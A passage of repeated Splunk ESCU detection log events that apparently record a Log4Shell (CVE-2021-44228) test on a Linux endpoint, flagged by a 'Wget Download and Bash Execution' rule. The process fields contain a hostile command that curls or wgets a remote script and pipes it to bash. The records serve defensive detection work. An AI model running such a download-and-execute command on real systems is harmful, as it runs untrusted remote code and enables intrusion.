Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. Note that the matched process line may be a bare wget invocation with no pipe to bash (as in this event, a direct .jar download from a bash parent), so the risk message's claim that the file is run with bash should be confirmed from the parent command line (e.g. a `/bin/sh -c (...)|bash` wrapper) before escalating.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget 
https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. Note that the matched process line may be a bare wget invocation with no pipe to bash (as in this event, a direct .jar download from a bash parent), so the risk message's claim that the file is run with bash should be confirmed from the parent command line (e.g. a `/bin/sh -c (...)|bash` wrapper) before escalating.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 